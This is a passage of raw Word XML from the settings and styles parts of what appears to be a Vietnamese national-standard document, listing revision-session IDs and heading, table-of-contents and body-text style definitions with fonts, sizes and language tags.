    <w:rsid w:val="00CD3E0A"/>
    <w:rsid w:val="00D04F5D"/>
    <w:rsid w:val="00D16262"/>
    <w:rsid w:val="00D20E28"/>
    <w:rsid w:val="00D24A7B"/>
    <w:rsid w:val="00D24BA5"/>
    <w:rsid w:val="00D33928"/>
    <w:rsid w:val="00D347E5"/>
    <w:rsid w:val="00D40EFE"/>
    <w:rsid w:val="00D448F0"/>
    <w:rsid w:val="00D44F67"/>
    <w:rsid w:val="00D5397A"/>
    <w:rsid w:val="00D5621D"/>
    <w:rsid w:val="00D63D1D"/>
    <w:rsid w:val="00D65B82"/>
    <w:rsid w:val="00D74E95"/>
    <w:rsid w:val="00D75DE3"/>
    <w:rsid w:val="00D76925"/>
    <w:rsid w:val="00D86F53"/>
    <w:rsid w:val="00D87411"/>
    <w:rsid w:val="00D91E6A"/>
    <w:rsid w:val="00DA0BB5"/>
    <w:rsid w:val="00DA2887"/>
    <w:rsid w:val="00DA65A6"/>
    <w:rsid w:val="00DB4771"/>
    <w:rsid w:val="00DC02CE"/>
    <w:rsid w:val="00DC0C04"/>
    <w:rsid w:val="00DC449F"/>
    <w:rsid w:val="00DC7685"/>
    <w:rsid w:val="00DD7CA6"/>
    <w:rsid w:val="00DE13D2"/>
    <w:rsid w:val="00DE2DFB"/>
    <w:rsid w:val="00DE3774"/>
    <w:rsid w:val="00DF05E6"/>
    <w:rsid w:val="00E00913"/>
    <w:rsid w:val="00E02B5A"/>
    <w:rsid w:val="00E0794A"/>
    <w:rsid w:val="00E209D4"/>
    <w:rsid w:val="00E211D4"/>
    <w:rsid w:val="00E21DCE"/>
    <w:rsid w:val="00E22E5E"/>
    <w:rsid w:val="00E24FD5"/>
    <w:rsid w:val="00E25F92"/>
    <w:rsid w:val="00E34417"/>
    <w:rsid w:val="00E404EC"/>
    <w:rsid w:val="00E423D0"/>
    <w:rsid w:val="00E43C44"/>
    <w:rsid w:val="00E4629A"/>
    <w:rsid w:val="00E51F39"/>
    <w:rsid w:val="00E546F8"/>
    <w:rsid w:val="00E61606"/>
    <w:rsid w:val="00E6266A"/>
    <w:rsid w:val="00E629B3"/>
    <w:rsid w:val="00E67D2F"/>
    <w:rsid w:val="00E7195F"/>
    <w:rsid w:val="00E7254D"/>
    <w:rsid w:val="00E7289D"/>
    <w:rsid w:val="00E74B14"/>
    <w:rsid w:val="00E84BBA"/>
    <w:rsid w:val="00E8585A"/>
    <w:rsid w:val="00E906B8"/>
    <w:rsid w:val="00E937B8"/>
    <w:rsid w:val="00EA060E"/>
    <w:rsid w:val="00EA0B48"/>
    <w:rsid w:val="00EA57B2"/>
    <w:rsid w:val="00EA5A29"/>
    <w:rsid w:val="00EA6307"/>
    <w:rsid w:val="00EA74D7"/>
    <w:rsid w:val="00EA77DD"/>
    <w:rsid w:val="00EB688C"/>
    <w:rsid w:val="00EC0AE1"/>
    <w:rsid w:val="00EC6AC5"/>
    <w:rsid w:val="00ED0338"/>
    <w:rsid w:val="00EE16A1"/>
    <w:rsid w:val="00EE1FF2"/>
    <w:rsid w:val="00EE52DE"/>
    <w:rsid w:val="00EF66DF"/>
    <w:rsid w:val="00F01CE4"/>
    <w:rsid w:val="00F303BE"/>
    <w:rsid w:val="00F36F97"/>
    <w:rsid w:val="00F371BF"/>
    <w:rsid w:val="00F448AC"/>
    <w:rsid w:val="00F44C7E"/>
    <w:rsid w:val="00F51D27"/>
    <w:rsid w:val="00F54261"/>
    <w:rsid w:val="00F55F6D"/>
    <w:rsid w:val="00F629B9"/>
    <w:rsid w:val="00F74F86"/>
    <w:rsid w:val="00F86BBB"/>
    <w:rsid w:val="00FA4ADD"/>
    <w:rsid w:val="00FA56AE"/>
    <w:rsid w:val="00FB5AA4"/>
    <w:rsid w:val="00FB7A1D"/>
    <w:rsid w:val="00FC1FD4"/>
    <w:rsid w:val="00FC43E1"/>
    <w:rsid w:val="00FD2900"/>
    <w:rsid w:val="00FD4D13"/>
    <w:rsid w:val="00FD5C86"/>
    <w:rsid w:val="00FE156A"/>
    <w:rsid w:val="00FE3BC0"/>
    <w:rsid w:val="00FE6341"/>
    <w:rsid w:val="00FF1559"/>
    <w:rsid w:val="00FF4537"/>
    <w:rsid w:val="00FF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2EE6995"/>
  <w15:docId w15:val="{11BB42C8-04E2-4763-B4A3-F18533FD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120" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="30"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:szCs w:val="22"/>
      <w:u w:val="single"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="120"/>
      <w:ind w:left="734"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="40" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="40" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="272727"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D1417"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="40" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman"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b/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-V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b/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN" w:eastAsia="zh-CN"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hint="default"/>
      <w:szCs w:val="22"/>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szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num11z0">
    <w:name w:val="WW8Num11z0"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z0">
    <w:name w:val="WW8Num12z0"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z0">
    <w:name w:val="WW8Num13z0"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num14z0">
    <w:name w:val="WW8Num14z0"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z0">
    <w:name w:val="WW8Num15z0"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="OpenSymbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z1">
    <w:name w:val="WW8Num15z1"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>
    </w:rPr>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DefaultParagraphFont111">
    <w:name w:val="WW-Default Paragraph Font111"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharacters">
    <w:name w:val="Footnote Characters"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="solist">
    <w:name w:val="solist"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="default"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="expandstyle">
    <w:name w:val="expandstyle"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="assignable-content1">
    <w:name w:val="assignable-content1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="path">
    <w:name w:val="path"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="util">
    <w:name w:val="util"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Calibri" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="shorttext">
    <w:name w:val="short_text"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="alt-edited">
    <w:name w:val="alt-edited"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>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PageNumber">
    <w:name w:val="page number"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="12" w:space="1" w:color="000000"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="000000"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="BodyText"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Lohit Devanagari"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Lohit Devanagari"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Lohit Devanagari"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="280" w:after="280"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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ind w:left="367"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="toc">
    <w:name w:val="toc"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="48"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="toc2">
    <w:name w:val="toc2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="24" w:after="24"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="assignable-content">
    <w:name w:val="assignable-content"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="48" w:after="48"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="comment-aa">
    <w:name w:val="comment-aa"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F5F5DC"/>
      <w:spacing w:before="48" w:after="48"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="008000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Calibri" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ColorfulList-Accent11">
    <w:name w:val="Colorful List - Accent 11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>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TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="MS Gothic" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9498"/>
      </w:tabs>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9498"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="198"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="600"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TieuchuanQG">
    <w:name w:val="Tieu chuan QG"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="18" w:space="1" w:color="000000"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="18" w:space="1" w:color="000000"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9639"/>
      </w:tabs>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
